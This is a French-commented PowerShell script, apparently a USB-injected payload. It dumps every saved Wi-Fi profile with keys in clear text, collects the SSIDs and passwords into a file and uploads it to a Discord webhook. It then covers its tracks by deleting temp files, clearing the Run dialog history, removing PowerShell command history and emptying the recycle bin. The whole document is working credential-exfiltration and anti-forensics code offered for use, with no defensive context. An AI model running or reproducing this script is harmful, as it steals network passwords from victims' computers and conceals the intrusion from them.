# ===========================
# FONCTION : EXPORTER PROFILS WIFI EN TEXTE LISIBLE
# ===========================
function Export-WiFiProfiles {
    $tempFolder = "$env:TEMP\WiFi_Profiles"
    if (-Not (Test-Path $tempFolder)) {
        New-Item -ItemType Directory -Path $tempFolder | Out-Null
    }

    # Exporter tous les profils en XML
    netsh wlan export profile key=clear folder=$tempFolder | Out-Null

    # Fichier texte final
    $outputFile = "$env:TEMP\--wifi-pass.txt"
    "" | Out-File -FilePath $outputFile -Encoding UTF8  # vider/créer le fichier

    # Pour chaque profil, extraire SSID et mot de passe
    Get-ChildItem -Path $tempFolder -Filter *.xml | ForEach-Object {
        [xml]$profileXml = Get-Content $_.FullName
        $ssid = $profileXml.WLANProfile.SSIDConfig.SSID.name
        $password = $profileXml.WLANProfile.MSM.security.sharedKey.keyMaterial
        if (-not $password) { $password = "[Aucun mot de passe]" }

        Add-Content -Path $outputFile -Value "SSID : $ssid"
        Add-Content -Path $outputFile -Value "Mot de passe : $password"
        Add-Content -Path $outputFile -Value "----------------------------------------"
    }

    return $outputFile
}

# ===========================
# FONCTION : UPLOAD VERS DISCORD
# ===========================
function Upload-Discord {
    [CmdletBinding()]
    param (
        [parameter(Position=0,Mandatory=$False)]
        [string]$file,
        [parameter(Position=1,Mandatory=$False)]
        [string]$text
    )
    $hookurl = "$dc"
    $Body = @{
        'username' = $env:username
        'content'  = $text
    }
    if (-not ([string]::IsNullOrEmpty($text))) {
        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
    }
    if (-not ([string]::IsNullOrEmpty($file))) {
        curl.exe -F "file1=@$file" $hookurl
    }
}

# ===========================
# FONCTION : NETTOYAGE
# ===========================
function Clean-Exfil {
    rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
    reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
    Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
    Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}

# ===========================
# MAIN
# ===========================
if (-not ([string]::IsNullOrEmpty($dc))) {
    $wifiFile = Export-WiFiProfiles
    Upload-Discord -file $wifiFile
}

if (-not ([string]::IsNullOrEmpty($ce))) {
    Clean-Exfil
}

if (Test-Path "$env:TEMP\--wifi-pass.txt") {
    Remove-Item "$env:TEMP\--wifi-pass.txt" -Force -ErrorAction SilentlyContinue
}
